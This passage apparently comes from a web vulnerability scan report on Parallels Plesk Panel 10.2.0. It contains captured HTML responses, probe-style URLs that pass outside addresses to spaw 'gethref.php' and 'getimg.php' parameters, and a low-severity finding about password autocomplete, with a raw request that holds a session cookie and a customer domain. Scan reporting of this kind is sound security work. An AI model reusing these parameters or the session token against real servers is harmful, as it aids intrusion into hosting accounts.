&lt;strong&gt;&lt;a href=&quot;http://www.vulnerable.host.fqdn:8880/spaw/gethref.php?img=http://www.parallels.com/products/panel/intro&quot;&gt;Parallels&amp;reg; Panel&lt;/a&gt;&lt;/strong&gt;
&lt;a href=&quot;http://www.vulnerable.host.fqdn:8880/spaw/gethref.php?img=http://www.parallels.com/products/panel/intro&quot;&gt;&lt;img src=&quot;http://www.vulnerable.host.fqdn:8880/spaw/getimg.php?img=img/apps/pcp-box.gif&quot; alt=&quot;&quot; /&gt;&lt;/a&gt;
&lt;p&gt;The Best Control Panel Ever For Easy, Complete and Profitable Hosting&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt; @@BEGIN_OF_COMMENT /#body @@END_OF_COMMENT

&lt;script type=&quot;text/javascript&quot;&gt;
//&lt;![CDATA[
if (window.plesk_promo.virtuozzo) {
var boxVzProducts = document.getElementById('box-vz-products');
boxVzProducts.style.display = 'block';
}
//]]&gt;
&lt;/script&gt;

&lt;div class=&quot;footer&quot;&gt;
&lt;div class=&quot;footer-area&quot;&gt;
&lt;script type=&quot;text/javascript&quot;&gt;
//&lt;![CDATA[
if (window.product_copyrights) { writeFooter(); }
//]]&gt;
&lt;/script&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;script type=&quot;text/javascript&quot;&gt;(function(){var D=document,W=window;function A(){if(W.plesk){return;}W.plesk=1;if(D.getElementsByTagName){var S=D.getElementsByTagName(&quot;head&quot;)[0].appendChild(D.createElement(&quot;script&quot;));S.setAttribute(&quot;type&quot;,&quot;text/javascript&quot;);S.setAttribute(&quot;src&quot;,&quot;http://promo.parallels.com/js/promo.plesk.js&quot;)}}if(D.addEventListener){D.addEventListener(&quot;DOMContentLoaded&quot;,A,false)}/*@cc_on D.write(&quot;\x3cscript id=\&quot;_IE_onload\&quot; defer=\&quot;defer\&quot; src=\&quot;javascript:void(0)\&quot;&gt;\x3c\/script&gt;&quot;);(D.getElementById(&quot;_IE_onload&quot;)).onreadystatechange=function(){if(this.readyState==&quot;complete&quot;){A()}};@*/if(/WebK/i.test(navigator.userAgent)){var C=setInterval(function(){if(/loaded|complete/.test(D.readyState)){clearInterval(C);A()}},10)}W[/*@cc_on !@*/0?'attachEvent':'addEventListener'](/*@cc_on 'on'+@*/'load',A,false)})()&lt;/script&gt;
</textarea><input type="hidden" id="SPAW_spaw2_editor_mode" name="SPAW_spaw2_editor_mode" value="design"><input type="hidden" id="SPAW_spaw2_lang" value="en"><input type="hidden" id="SPAW_spaw2_theme" value="default"><input type="hidden" id="SPAW_spaw2_borders" value="on"><iframe id="spaw2_rEdit" style="width:100%; height:300px; direction:ltr;" class="SPAW_default_editarea" frameborder="no" src="/spaw/empty.html"></iframe><br>
<script language="javascript">
<!--
var spaw_tmpstr="";
if (window.onload != null) {
spaw_tmpstr = window.onload.toString();
var spaw_i = spaw_tmpstr.indexOf("{") + 2;
spaw_tmpstr = spaw_tmpstr.substr(spaw_i,spaw_tmpstr.length-spaw_i-2);
}
window.onload = new Function("SPAW_editorInit('spaw2','/spaw/wysiwyg.css','ltr');" + spaw_tmpstr);
//--></script></td><td id="SPAW_spaw2_toolbar_right_design" valign="top" class="SPAW_default_toolbar"></td><td id="SPAW_spaw2_toolbar_right_html" valign="top" class="SPAW_default_toolbar" style="display : none;"></td></tr><tr><td class="SPAW_default_toolbar"></td><td id="SPAW_spaw2_toolbar_bottom_design" class="SPAW_default_toolbar" width="100%"><table border="0" cellpadding="0" cellspacing="0" width="100%"><tr><td align="right" valign="top" class="SPAW_default_toolbar_bottom" nowrap="yes"><img id="SPAW_spaw2_tb_design_tab_on" alt="" src="/spaw/lib/themes/default/img/tb_design_tab_on.gif" unselectable="on"><img id="SPAW_spaw2_tb_html_tab" alt="Switch to HTML (code) mode" title="Switch to HTML (code) mode" src="/spaw/lib/themes/default/img/tb_html_tab.gif" onClick="SPAW_html_tab_click('spaw2',this)" class="SPAW_default_tb_out" onMouseOver="SPAW_default_bt_over(this)" onMouseOut="SPAW_default_bt_out(this)" onMouseDown="SPAW_default_bt_down(this)" onMouseUp="SPAW_default_bt_up(this)" unselectable="on"></td></tr></table></td><td id="SPAW_spaw2_toolbar_bottom_html" class="SPAW_default_toolbar" width="100%" style="display : none;"><table border="0" cellpadding="0" cellspacing="0" width="100%"><tr><td align="right" valign="top" class="SPAW_default_toolbar_bottom" nowrap="yes"><img id="SPAW_spaw2_tb_design_tab" alt="Switch to WYSIWYG (design) mode" title="Switch to WYSIWYG (design) mode" src="/spaw/lib/themes/default/img/tb_design_tab.gif" onClick="SPAW_design_tab_click('spaw2',this)" class="SPAW_default_tb_out" onMouseOver="SPAW_default_bt_over(this)" onMouseOut="SPAW_default_bt_out(this)" onMouseDown="SPAW_default_bt_down(this)" onMouseUp="SPAW_default_bt_up(this)" unselectable="on"><img id="SPAW_spaw2_tb_html_tab_on" alt="" src="/spaw/lib/themes/default/img/tb_html_tab_on.gif" unselectable="on"></td></tr></table></td><td class="SPAW_default_toolbar"></td></tr></table>
   </td></tr></table></fieldset>

   <fieldset>
       <legend>Saving settings</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>
       <table class="formFields" cellspacing="0" width="100%">
           <tr>
               <td class="name">Save in the following encoding:</td>
               <td><select name="save_codepage" id="fid-save_codepage" >    <option value='437'>437</option>
   <option value='850'>850</option>
   <option value='852'>852</option>
   <option value='855'>855</option>
   <option value='857'>857</option>
   <option value='860'>860</option>
   <option value='861'>861</option>
   <option value='862'>862</option>
   <option value='863'>863</option>
   <option value='865'>865</option>
   <option value='866'>866</option>
   <option value='869'>869</option>
   <option value='ANSI_X3.4-1968'>ANSI_X3.4-1968</option>
   <option value='ANSI_X3.4-1986'>ANSI_X3.4-1986</option>
   <option value='ARABIC'>ARABIC</option>
   <option value='ARMSCII-8'>ARMSCII-8</option>
   <option value='ASCII'>ASCII</option>
   <option value='ASMO-708'>ASMO-708</option>
   <option value='BIG-5'>BIG-5</option>
   <option value='BIG-FIVE'>BIG-FIVE</option>
   <option value='BIG5'>BIG5</option>
   <option value='BIG5-HKSCS'>BIG5-HKSCS</option>
   <option value='BIG5HKSCS'>BIG5HKSCS</option>
   <option value='BIGFIVE'>BIGFIVE</option>
   <option value='C99'>C99</option>
   <option value='CN'>CN</option>
   <option value='CN-BIG5'>CN-BIG5</option>
   <option value='CN-GB'>CN-GB</option>
   <option value='CP-GR'>CP-GR</option>
   <option value='CP1125'>CP1125</option>
   <option value='CP1133'>CP1133</option>
   <option value='CP1250'>CP1250</option>
   <option value='CP1251'>CP1251</option>
   <option value='CP1252'>CP1252</option>
   <option value='CP1253'>CP1253</option>
   <option value='CP1254'>CP1254</option>
   <option value='CP1255'>CP1255</option>
   <option value='CP1256'>CP1256</option>
   <option value='CP1257'>CP1257</option>
   <option value='CP1258'>CP1258</option>
   <option value='CP1361'>CP1361</option>
   <option value='CP367'>CP367</option>
   <option value='CP437'>CP437</option>
   <option value='CP737'>CP737</option>
   <option value='CP775'>CP775</option>
   <option value='CP819'>CP819</option>
   <option value='CP850'>CP850</option>
   <option value='CP852'>CP852</option>
   <option value='CP853'>CP853</option>
   <option value='CP855'>CP855</option>
   <option value='CP857'>CP857</option>
   <option value='CP858'>CP858</option>
   <option value='CP860'>CP860</option>
   <option value='CP861'>CP861</option>
   <option value='CP862'>CP862</option>
   <option value='CP863'>CP863</option>
   <option value='CP864'>CP864</option>
   <option value='CP865'>CP865</option>
   <option value='CP866'>CP866</option>
   <option value='CP869'>CP869</option>
   <option value='CP874'>CP874</option>
   <option value='CP932'>CP932</option>
   <option value='CP936'>CP936</option>
   <option value='CP949'>CP949</option>
   <option value='CP950'>CP950</option>
   <option value='CSASCII'>CSASCII</option>
   <option value='CSEUCKR'>CSEUCKR</option>
   <option value='CSEUCPKDFMTJAPANESE'>CSEUCPKDFMTJAPANESE</option>
   <option value='CSGB2312'>CSGB2312</option>
   <option value='CSHPROMAN8'>CSHPROMAN8</option>
   <option value='CSIBM855'>CSIBM855</option>
   <option value='CSIBM857'>CSIBM857</option>
   <option value='CSIBM860'>CSIBM860</option>
   <option value='CSIBM863'>CSIBM863</option>
   <option value='CSIBM864'>CSIBM864</option>
   <option value='CSIBM865'>CSIBM865</option>
   <option value='CSIBM866'>CSIBM866</option>
   <option value='CSIBM869'>CSIBM869</option>
   <option value='CSISO14JISC6220RO'>CSISO14JISC6220RO</option>
   <option value='CSISO2022CN'>CSISO2022CN</option>
   <option value='CSISO2022JP'>CSISO2022JP</option>
   <option value='CSISO2022JP2'>CSISO2022JP2</option>
   <option value='CSISO2022KR'>CSISO2022KR</option>
   <option value='CSISOLATIN1'>CSISOLATIN1</option>
   <option value='CSISOLATIN2'>CSISOLATIN2</option>
   <option value='CSISOLATIN3'>CSISOLATIN3</option>
   <option value='CSISOLATIN4'>CSISOLATIN4</option>
   <option value='CSISOLATIN5'>CSISOLATIN5</option>
   <option value='CSISOLATIN6'>CSISOLATIN6</option>
   <option value='CSISOLATINARABIC'>CSISOLATINARABIC</option>
   <option value='CSISOLATINCYRILLIC'>CSISOLATINCYRILLIC</option>
   <option value='CSISOLATINGREEK'>CSISOLATINGREEK</option>
   <option value='CSISOLATINHEBREW'>CSISOLATINHEBREW</option>
   <option value='CSKOI8R'>CSKOI8R</option>
   <option value='CSMACINTOSH'>CSMACINTOSH</option>
   <option value='CSPC775BALTIC'>CSPC775BALTIC</option>
   <option value='CSPC850MULTILINGUAL'>CSPC850MULTILINGUAL</option>
   <option value='CSPC862LATINHEBREW'>CSPC862LATINHEBREW</option>
   <option value='CSPC8CODEPAGE437'>CSPC8CODEPAGE437</option>
   <option value='CSPCP852'>CSPCP852</option>
   <option value='CSSHIFTJIS'>CSSHIFTJIS</option>
   <option value='CSUCS4'>CSUCS4</option>
   <option value='CSUNICODE'>CSUNICODE</option>
   <option value='CYRILLIC'>CYRILLIC</option>
   <option value='ECMA-114'>ECMA-114</option>
   <option value='ECMA-118'>ECMA-118</option>
   <option value='ELOT_928'>ELOT_928</option>
   <option value='EUC-CN'>EUC-CN</option>
   <option value='EUC-JP'>EUC-JP</option>
   <option value='EUC-KR'>EUC-KR</option>
   <option value='EUC-TW'>EUC-TW</option>
   <option value='EUCCN'>EUCCN</option>
   <option value='EUCJP'>EUCJP</option>
   <option value='EUCKR'>EUCKR</option>
   <option value='EUCTW'>EUCTW</option>
   <option value='GB18030'>GB18030</option>
   <option value='GB2312'>GB2312</option>
   <option value='GBK'>GBK</option>
   <option value='GB_1988-80'>GB_1988-80</option>
   <option value='GEORGIAN-ACADEMY'>GEORGIAN-ACADEMY</option>
   <option value='GEORGIAN-PS'>GEORGIAN-PS</option>
   <option value='GREEK'>GREEK</option>
   <option value='GREEK8'>GREEK8</option>
   <option value='Georgian-Academy'>Georgian-Academy</option>
   <option value='Georgian-PS'>Georgian-PS</option>
   <option value='HEBREW'>HEBREW</option>
   <option value='HP-ROMAN8'>HP-ROMAN8</option>
   <option value='HZ'>HZ</option>
   <option value='IBM367'>IBM367</option>
   <option value='IBM437'>IBM437</option>
   <option value='IBM775'>IBM775</option>
   <option value='IBM819'>IBM819</option>
   <option value='IBM850'>IBM850</option>
   <option value='IBM852'>IBM852</option>
   <option value='IBM855'>IBM855</option>
   <option value='IBM857'>IBM857</option>
   <option value='IBM860'>IBM860</option>
   <option value='IBM861'>IBM861</option>
   <option value='IBM862'>IBM862</option>
   <option value='IBM863'>IBM863</option>
   <option value='IBM864'>IBM864</option>
   <option value='IBM865'>IBM865</option>
   <option value='IBM866'>IBM866</option>
   <option value='IBM869'>IBM869</option>
   <option value='ISO-2022-CN'>ISO-2022-CN</option>
   <option value='ISO-2022-CN-EXT'>ISO-2022-CN-EXT</option>
   <option value='ISO-2022-JP'>ISO-2022-JP</option>
   <option value='ISO-2022-JP-1'>ISO-2022-JP-1</option>
   <option value='ISO-2022-JP-2'>ISO-2022-JP-2</option>
   <option value='ISO-2022-KR'>ISO-2022-KR</option>
   <option value='ISO-8859-1'>ISO-8859-1</option>
   <option value='ISO-8859-10'>ISO-8859-10</option>
   <option value='ISO-8859-13'>ISO-8859-13</option>
   <option value='ISO-8859-14'>ISO-8859-14</option>
   <option value='ISO-8859-15'>ISO-8859-15</option>
   <option value='ISO-8859-16'>ISO-8859-16</option>
   <option value='ISO-8859-2'>ISO-8859-2</option>
   <option value='ISO-8859-3'>ISO-8859-3</option>
   <option value='ISO-8859-4'>ISO-8859-4</option>
   <option value='ISO-8859-5'>ISO-8859-5</option>
   <option value='ISO-8859-6'>ISO-8859-6</option>
   <option value='ISO-8859-7'>ISO-8859-7</option>
   <option value='ISO-8859-8'>ISO-8859-8</option>
   <option value='ISO-8859-9'>ISO-8859-9</option>
   <option value='ISO-CELTIC'>ISO-CELTIC</option>
   <option value='ISO-IR-100'>ISO-IR-100</option>
   <option value='ISO-IR-101'>ISO-IR-101</option>
   <option value='ISO-IR-109'>ISO-IR-109</option>
   <option value='ISO-IR-110'>ISO-IR-110</option>
   <option value='ISO-IR-126'>ISO-IR-126</option>
   <option value='ISO-IR-127'>ISO-IR-127</option>
   <option value='ISO-IR-138'>ISO-IR-138</option>
   <option value='ISO-IR-14'>ISO-IR-14</option>
   <option value='ISO-IR-144'>ISO-IR-144</option>
   <option value='ISO-IR-148'>ISO-IR-148</option>
   <option value='ISO-IR-157'>ISO-IR-157</option>
   <option value='ISO-IR-166'>ISO-IR-166</option>
   <option value='ISO-IR-179'>ISO-IR-179</option>
   <option value='ISO-IR-199'>ISO-IR-199</option>
   <option value='ISO-IR-203'>ISO-IR-203</option>
   <option value='ISO-IR-226'>ISO-IR-226</option>
   <option value='ISO-IR-57'>ISO-IR-57</option>
   <option value='ISO-IR-6'>ISO-IR-6</option>
   <option value='ISO646-CN'>ISO646-CN</option>
   <option value='ISO646-JP'>ISO646-JP</option>
   <option value='ISO646-US'>ISO646-US</option>
   <option value='ISO_646.IRV:1991'>ISO_646.IRV:1991</option>
   <option value='ISO_8859-1'>ISO_8859-1</option>
   <option value='ISO_8859-10'>ISO_8859-10</option>
   <option value='ISO_8859-10:1992'>ISO_8859-10:1992</option>
   <option value='ISO_8859-14'>ISO_8859-14</option>
   <option value='ISO_8859-14:1998'>ISO_8859-14:1998</option>
   <option value='ISO_8859-15'>ISO_8859-15</option>
   <option value='ISO_8859-15:1998'>ISO_8859-15:1998</option>
   <option value='ISO_8859-16'>ISO_8859-16</option>
   <option value='ISO_8859-1:1987'>ISO_8859-1:1987</option>
   <option value='ISO_8859-2'>ISO_8859-2</option>
   <option value='ISO_8859-2:1987'>ISO_8859-2:1987</option>
   <option value='ISO_8859-3'>ISO_8859-3</option>
   <option value='ISO_8859-3:1988'>ISO_8859-3:1988</option>
   <option value='ISO_8859-4'>ISO_8859-4</option>
   <option value='ISO_8859-4:1988'>ISO_8859-4:1988</option>
   <option value='ISO_8859-5'>ISO_8859-5</option>
   <option value='ISO_8859-5:1988'>ISO_8859-5:1988</option>
   <option value='ISO_8859-6'>ISO_8859-6</option>
   <option value='ISO_8859-6:1987'>ISO_8859-6:1987</option>
   <option value='ISO_8859-7'>ISO_8859-7</option>
   <option value='ISO_8859-7:1987'>ISO_8859-7:1987</option>
   <option value='ISO_8859-8'>ISO_8859-8</option>
   <option value='ISO_8859-8:1988'>ISO_8859-8:1988</option>
   <option value='ISO_8859-9'>ISO_8859-9</option>
   <option value='ISO_8859-9:1989'>ISO_8859-9:1989</option>
   <option value='JAVA'>JAVA</option>
   <option value='JIS_C6220-1969-RO'>JIS_C6220-1969-RO</option>
   <option value='JOHAB'>JOHAB</option>
   <option value='JP'>JP</option>
   <option value='KOI8-R'>KOI8-R</option>
   <option value='KOI8-RU'>KOI8-RU</option>
   <option value='KOI8-T'>KOI8-T</option>
   <option value='KOI8-U'>KOI8-U</option>
   <option value='L1'>L1</option>
   <option value='L2'>L2</option>
   <option value='L3'>L3</option>
   <option value='L4'>L4</option>
   <option value='L5'>L5</option>
   <option value='L6'>L6</option>
   <option value='L7'>L7</option>
   <option value='L8'>L8</option>
   <option value='LATIN1'>LATIN1</option>
   <option value='LATIN2'>LATIN2</option>
   <option value='LATIN3'>LATIN3</option>
   <option value='LATIN4'>LATIN4</option>
   <option value='LATIN5'>LATIN5</option>
   <option value='LATIN6'>LATIN6</option>
   <option value='LATIN7'>LATIN7</option>
   <option value='LATIN8'>LATIN8</option>
   <option value='MAC'>MAC</option>
   <option value='MACARABIC'>MACARABIC</option>
   <option value='MACCENTRALEUROPE'>MACCENTRALEUROPE</option>
   <option value='MACCROATIAN'>MACCROATIAN</option>
   <option value='MACCYRILLIC'>MACCYRILLIC</option>
   <option value='MACGREEK'>MACGREEK</option>
   <option value='MACHEBREW'>MACHEBREW</option>
   <option value='MACICELAND'>MACICELAND</option>
   <option value='MACINTOSH'>MACINTOSH</option>
   <option value='MACROMAN'>MACROMAN</option>
   <option value='MACROMANIA'>MACROMANIA</option>
   <option value='MACTURKISH'>MACTURKISH</option>
   <option value='MACUKRAINE'>MACUKRAINE</option>
   <option value='MS-ANSI'>MS-ANSI</option>
   <option value='MS-ARAB'>MS-ARAB</option>
   <option value='MS-CYRL'>MS-CYRL</option>
   <option value='MS-EE'>MS-EE</option>
   <option value='MS-GREEK'>MS-GREEK</option>
   <option value='MS-HEBR'>MS-HEBR</option>
   <option value='MS-TURK'>MS-TURK</option>
   <option value='MS_KANJI'>MS_KANJI</option>
   <option value='MacThai'>MacThai</option>
   <option value='MuleLao-1'>MuleLao-1</option>
   <option value='NEXTSTEP'>NEXTSTEP</option>
   <option value='R8'>R8</option>
   <option value='ROMAN8'>ROMAN8</option>
   <option value='SHIFT-JIS'>SHIFT-JIS</option>
   <option value='SHIFT_JIS'>SHIFT_JIS</option>
   <option value='SJIS'>SJIS</option>
   <option value='TCVN'>TCVN</option>
   <option value='TCVN-5712'>TCVN-5712</option>
   <option value='TCVN5712-1'>TCVN5712-1</option>
   <option value='TCVN5712-1:1993'>TCVN5712-1:1993</option>
   <option value='TIS-620'>TIS-620</option>
   <option value='TIS620'>TIS620</option>
   <option value='TIS620-0'>TIS620-0</option>
   <option value='TIS620.2529-1'>TIS620.2529-1</option>
   <option value='TIS620.2533-0'>TIS620.2533-0</option>
   <option value='UCS-2'>UCS-2</option>
   <option value='UCS-2-INTERNAL'>UCS-2-INTERNAL</option>
   <option value='UCS-2BE'>UCS-2BE</option>
   <option value='UCS-2LE'>UCS-2LE</option>
   <option value='UCS-4'>UCS-4</option>
   <option value='UCS-4-INTERNAL'>UCS-4-INTERNAL</option>
   <option value='UCS-4BE'>UCS-4BE</option>
   <option value='UCS-4LE'>UCS-4LE</option>
   <option value='UHC'>UHC</option>
   <option value='UNICODEBIG'>UNICODEBIG</option>
   <option value='UNICODELITTLE'>UNICODELITTLE</option>
   <option value='US'>US</option>
   <option value='US-ASCII'>US-ASCII</option>
   <option value='UTF-16'>UTF-16</option>
   <option value='UTF-16BE'>UTF-16BE</option>
   <option value='UTF-16LE'>UTF-16LE</option>
   <option value='UTF-32'>UTF-32</option>
   <option value='UTF-32BE'>UTF-32BE</option>
   <option value='UTF-32LE'>UTF-32LE</option>
   <option value='UTF-7'>UTF-7</option>
   <option value='UTF-8' SELECTED>UTF-8</option>
   <option value='VISCII'>VISCII</option>
   <option value='WINBALTRIM'>WINBALTRIM</option>
   <option value='WINDOWS-1250'>WINDOWS-1250</option>
   <option value='WINDOWS-1251'>WINDOWS-1251</option>
   <option value='WINDOWS-1252'>WINDOWS-1252</option>
   <option value='WINDOWS-1253'>WINDOWS-1253</option>
   <option value='WINDOWS-1254'>WINDOWS-1254</option>
   <option value='WINDOWS-1255'>WINDOWS-1255</option>
   <option value='WINDOWS-1256'>WINDOWS-1256</option>
   <option value='WINDOWS-1257'>WINDOWS-1257</option>
   <option value='WINDOWS-1258'>WINDOWS-1258</option>
</select>
</td>
           </tr>
           <tr>
               <td class="name"><label for="fid-save_as">Save as</label></td>
               <td>
                   <input type="checkbox" class="checkbox" value="true" id="fid-save_as" name="save_as" onClick="save_as_oC(getForm(this));">
                   <input type="text" id="fid-save_as_file" name="save_as_file" size="35" maxlength="255" value="/httpdocs/index.html">
               </td>
           </tr>
       </table>
   </td></tr></table></fieldset>

   
   <div class="formArea">
       <input name="cmd" type="hidden" value="update">
       <input name="header" type="hidden" value="PCFET0NUWVBFIGh0bWwgUFVCTElDICItLy9XM0MvL0RURCBYSFRNTCAxLjAgU3RyaWN0Ly9FTiINCiJodHRwOi8vd3d3LnczLm9yZy9UUi94aHRtbDEvRFREL3hodG1sMS1zdHJpY3QuZHRkIj4NCjxodG1sIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hodG1sIiB4bWw6bGFuZz0iZW4iIGxhbmc9ImVuIj4NCjxoZWFkPg0KPHRpdGxlPkRvbWFpbiBEZWZhdWx0IHBhZ2U8L3RpdGxlPg0KPG1ldGEgaHR0cC1lcXVpdj0iQ29udGVudC1UeXBlIiBjb250ZW50PSJ0ZXh0L2h0bWw7IGNoYXJzZXQ9dXRmLTgiIC8+DQo8bWV0YSBodHRwLWVxdWl2PSJDYWNoZS1Db250cm9sIiBjb250ZW50PSJuby1jYWNoZSIgLz4NCjxsaW5rIHJlbD0ic2hvcnRjdXQgaWNvbiIgaHJlZj0iZmF2aWNvbi5pY28iIHR5cGU9ImltYWdlL3gtaWNvbiIgLz4NCjxsaW5rIHJlbD0iaWNvbiIgaHJlZj0iZmF2aWNvbi5pY28iIHR5cGU9ImltYWdlL3gtaWNvbiIgLz4NCjxsaW5rIHJlbD0ic3R5bGVzaGVldCIgdHlwZT0idGV4dC9jc3MiIGhyZWY9ImNzcy9zdHlsZS5jc3MiIC8+DQo8c2NyaXB0IHR5cGU9InRleHQvamF2YXNjcmlwdCIgc3JjPSJoZWFkZXIuanMiPjwvc2NyaXB0Pg0KPHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPndyaXRlQ29weUZsYWcoKTs8L3NjcmlwdD4NCjwvaGVhZD4NCjxib2R5Pg==">
       <input name="footer" type="hidden" value="PC9ib2R5Pg0KPC9odG1sPg0K">
       <input name="file_name" type="hidden" value="/httpdocs/index.html">
       <input name="forgery_protection_token" type="hidden" value="bdaafe67daaa200e2f077bd9577b09f4">

       <table width="100%" class="buttons" cellspacing="0" cellpadding="0"><tr>
           <td class="main" width="0"></td>
           <td class="footnote" id="footnote"></td>
           <td class="misc" width="0"><nobr>
               <DIV class="commonButton" id="bid-ok" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Apply all changes.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);update_oC(document.forms[0]);;return false;" style=""><BUTTON name="bname_ok" id="buttonid-ok" type="submit" onClick="Event.stop(event);update_oC(document.forms[0]);;return false;">OK</BUTTON><SPAN id="spanid-ok">OK</SPAN><INPUT type="image" style="border: 0pt none ; height: 0pt; width: 0pt; position: absolute; left: -9999px;" src="/skins/default/plesk/images/1x1.gif"></DIV>
               <DIV class="commonButton" id="bid-cancel" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Discard any changes and return to the previous page.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@/domain@1/hosting/file-manager/&#039;); return false;" style=""><BUTTON name="bname_cancel" id="buttonid-cancel" type="button" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@/domain@1/hosting/file-manager/&#039;); return false;">Cancel</BUTTON><SPAN id="spanid-cancel">Cancel</SPAN></DIV>
           </nobr></td>
       </tr></table>
   </div>
</div>
</form>
   </div>
   </td></tr></table>
   
   <div id="bottomAnchor"></div>
   </body>
</html>

6. Password field with autocomplete enabled  previous  next
There are 8 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).


6.1. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/backup/ftp-repository/properties/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/domain@1/backup/ftp-repository/properties/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /plesk/client@2/domain@1/backup/ftp-repository/properties/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/plesk/client@2/domain@1/backup/local-repository/
Cookie: PLESKSESSID=544bdaf6dd2753ce86a143b36e3245b8; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 19:39:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 19:39:00 GMT
Connection: close
Content-Length: 15143

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="48333f77aef379c04c82252b59636182" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/general.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/layout.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/custom.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/desktop.css?2">
<!--[if IE]><link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/ie.css?2"><![endif]-->







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<link href="/skins/default/css/customer/plesk.css?1269638970" media="screen" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/javascript/tooltip.js?1302230642"></script>
<script type="text/javascript" src="/javascript/widget.js?1302230642"></script>
<script type="text/javascript" src="/javascript/chk.js.php?1302230642"></script>
<script type="text/javascript" src="/javascript/common.js?1302230642"></script>
<script type="text/javascript" src="/admin/scripts/admin-panel.js?"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
